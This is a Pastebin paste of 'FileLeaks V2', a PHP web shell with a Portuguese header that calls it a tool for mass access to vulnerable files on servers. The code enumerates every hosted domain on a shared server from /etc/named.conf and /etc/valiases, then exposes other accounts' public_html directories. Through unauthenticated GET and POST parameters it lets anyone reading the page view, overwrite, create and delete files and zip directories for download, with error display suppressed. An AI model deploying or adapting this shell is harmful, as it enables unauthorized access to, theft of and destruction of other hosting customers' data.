API tools faq
paste
rhiby

script jumping

rhiby
Feb 12th, 2012
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.59 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>FileLeaks V2</title>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. </head>
  6. <body style="background: black; padding-top: -10px;">
  7. <div class='header' style='color: white ; font-family: sans; height: 90px; width: 98%; background: url("http://hamboldt.com.br/head_bg.png"); padding: 10px;'>
  8. <b>FileLeaks V2</b><br/>
  9. <span style="font-size: 12px"> Ferramenta idealizada e produzida por "Lucas Andrade de Araújo" com o ideal de obter acesso a arquivos vulneráveis em massa
  10. em servidores locais com sincronia a banco de dados para arquivamento em massa e com possibilidade de download de todos os arquivos obtidos.
  11. <b>Este é um arquivo privado e não deve ser compartilhado!</b> <br/><br/>
  12.  
  13. <a href="?home" style="text-decoration: none; color: white"> Home </a> | Zip ( <B>Made in Brazil</B> )</span> <span style='padding-left: 91%;'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/br.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/ru.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/in.png'> <img src='http://cdn1.iconfinder.com/data/icons/famfamfam_flag_icons/cn.png'> </span>
  14. </div>
  15.  
  16. <div class = "body" style = "height: auto; width: 98%; background: rgb(64,64,64); font-family: sans; color: white; padding: 10px; font-size: 12px">
  17.  
  18. <?php
  19.  
  20. /**
  21. * Projeto FileLeaks V2
  22. * visando maior performance para trabalhar em
  23. * outras estruturas de servidores inclusive windows
  24. * Projeto iniciado em:
  25. * Segunda-Feira, 18 de Julho de 2011 - 21:11
  26. */
  27.  
  28. ini_set ('error_logs', false);
  29. ini_set ('display_errors', false);
  30.  
  31.  
  32. function _opensites() {
  33.  
  34. preg_match_all('/.*?zone "(.*?)" {/', file_get_contents("/etc/named.conf"), $Matches);
  35.  
  36. for($i = 0; $i < count($Matches[1])/2; $i++) {
  37.  
  38. $user = posix_getpwuid(fileowner("/etc/valiases/".$Matches[1][$i]));
  39.  
  40. if(opendir($user["dir"]."/public_html")) {
  41.  
  42. print("<a href='http://www.{$Matches[1][$i]}'><img src='http://cdn1.iconfinder.com/data/icons/socialmediaicons_v120/16/website.png'></a> <a href=?path=".$user['dir']."/public_html> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'></a> {$Matches[1][$i]} <br/>");
  43. }
  44. }
  45.  
  46.  
  47. }
  48.  
  49. if($_GET['path'] != null) {
  50.  
  51. if(is_dir($_GET['path'])) {
  52.  
  53. print("<img src='http://cdn1.iconfinder.com/data/icons/Basic_set2_Png/16/arrow_down.png'> <a style='text-decoration:none; color: white' href='?zip_path={$_GET['path']}'> Download <b>{$_GET['path']}</b>.</a><br/><br/>");
  54.  
  55. $dir = opendir($_GET['path']);
  56.  
  57. while (false !== $readdir = readdir($dir)) {
  58.  
  59.  
  60. if(is_dir($_GET['path'].'/'.$readdir)) {
  61.  
  62.  
  63. if(is_writable($_GET['path'].'/'.$readdir)) {
  64.  
  65. print("<a style='text-decoration:none; color: white' href=?path=".$_GET['path'].'/'.$readdir."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'> $readdir</a> (<a style='text-decoration:none; color: white' href=?path=".$_GET['path'].'/'.$readdir."><b>RW</b></a>)<br>");
  66.  
  67. }
  68.  
  69. else {
  70.  
  71. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/Folder.png'> $readdir</a> <br>");
  72. }
  73. }
  74.  
  75. if(is_file($_GET['path'].'/'.$readdir)) {
  76.  
  77. if(is_writable($_GET['path'].'/'.$readdir)) {
  78.  
  79. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/New.png'> $readdir</a> <span style='padding-left: 2%'> [<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."><b>RW</b></a>] [<a style='text-decoration:none; color: white' href=?unlink=".urlencode($_GET['path'].'/'.$readdir)."><b>Remove</b></a>]</span><br>");
  80.  
  81. }
  82.  
  83. else {
  84.  
  85. print("<a style='text-decoration:none; color: white' href=?path=".urlencode($_GET['path'].'/'.$readdir)."> <img src='http://cdn1.iconfinder.com/data/icons/musthave/16/New.png'> $readdir</a> <br>");
  86. }
  87.  
  88. }
  89. }
  90. }
  91.  
  92. }
  93.  
  94. if(is_file($_GET['path'])) {
  95.  
  96. if($_POST['content'] != null) {
  97.  
  98. $file = fopen($_GET['path'], 'w+');
  99.  
  100. if(fwrite($file, $_POST['content'])) {
  101. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Salvo! (<a style='color: white; text-decoration: none' href='?path=".urlencode($_GET['path'])."'><b>Continuar editando</b></a>)");
  102. }
  103. else {
  104. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro! (<a style='color: white; text-decoration: none' href='?path=".urlencode($_GET['path'])."><b>Voltar</b></a>)");
  105. }
  106. }
  107.  
  108. else {
  109.  
  110. print("<b>Arquivo:</b> {$_GET['path']}<br/><br/> <form action='' method='post'>
  111. <textarea name='content' style='background: rgb(16,16,16); color: #009933; border: 3px solid #000; width: 100%; height: 70%'>".htmlentities(file_get_contents($_GET['path']))."</textarea> <br/><br/>
  112. <input type='submit' value='salvar'></form>");
  113. }
  114.  
  115. }
  116.  
  117. if($_GET['path'] != null && file_exists($_GET['path']) == false) {
  118.  
  119. if($_POST['content'] != null) {
  120.  
  121. $file = fopen($_GET['path'], 'w+');
  122.  
  123. if(fwrite($file, $_POST['content'])) {
  124. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Salvo! (<a style='color: white; text-decoration: none' href='?path={$_GET['path']}'><b>Continuar editando</b></a>)");
  125. }
  126. else {
  127. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro! (<a style='color: white; text-decoration: none' href='?path={$_GET['path']}'><b>Voltar</b></a>)");
  128. }
  129. }
  130.  
  131. else {
  132.  
  133. print("<b>Novo Arquivo:</b> {$_GET['path']}<br/><br/> <form action='' method='post'>
  134. <textarea name='content' style='background: rgb(16,16,16); color: #009933; border: 3px solid #000; width: 100%; height: 70%'>".htmlentities(file_get_contents($_GET['path']))."</textarea> <br/><br/>
  135. <input type='submit' value='salvar'></form>");
  136. }
  137.  
  138. }
  139.  
  140. if($_GET['unlink'] != null) {
  141.  
  142. if(file_exists($_GET['unlink'])) {
  143.  
  144. if(unlink($_GET['unlink'])) {
  145.  
  146. print("<img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> Excluido (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  147. }
  148.  
  149. else {
  150.  
  151. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> Erro ao remover, cheque suas permissões. (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  152.  
  153. }
  154.  
  155. } else {
  156.  
  157. print("<img src='http://cdn2.iconfinder.com/data/icons/diagona/icon/16/101.png'> o arquivo <b>". htmlentities($_GET['unlink'])."</b> não existe! (<a style='color: white; text-decoration: none' href='javascript:history.go(-1);'> <b>voltar</b></a> )");
  158. }
  159. }
  160.  
  161. if($_GET['zip_path'] != null) {
  162.  
  163. $path = $_GET['zip_path'];
  164.  
  165. if($path = opendir($path)) {
  166.  
  167. unlink("./fileleaks.zip");
  168.  
  169.  
  170. $zip = new ZipArchive();
  171.  
  172. if($zip->open("fileleaks.zip", ZIPARCHIVE::OVERWRITE) == TRUE ) {
  173.  
  174. print("<img src='http://cdn4.iconfinder.com/data/icons/spirit20/file-zip.png'> Arquivos adicionados em fileleaks.zip: <br>");
  175.  
  176. while (false !== ($file = readdir($path))) {
  177.  
  178. if(is_file($_GET['zip_path'].'/'.$file) && is_readable($_GET['zip_path'].'/'.$file)) {
  179.  
  180. if($zip->addFile($_GET['zip_path'].'/'.$file, $file)) {
  181. print("<span style='padding-left: 20px'> <img src='http://cdn1.iconfinder.com/data/icons/silk2/tick.png'> arquivo <b>$file</b> salvo com sucesso! [".filesize($_GET['zip_path'].'/'.$file)/(1000000)." MB]</span> <br>");
  182. }
  183. }
  184.  
  185. }
  186.  
  187. $zip->close();
  188. print("<br> <a style='text-decoration: none; color: white' href='fileleaks.zip'><b>Baixar</b></a> [ fileleaks.zip ".filesize("fileleaks.zip")/(1000000)." MB ]");
  189.  
  190. }
  191.  
  192.  
  193. }
  194.  
  195. }
  196.  
  197. if($_GET['path'] == null && $_GET['unlink'] == null && $_GET['zip_path'] == null) {
  198.  
  199. _opensites();
  200.  
  201. }
  202.  
  203. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!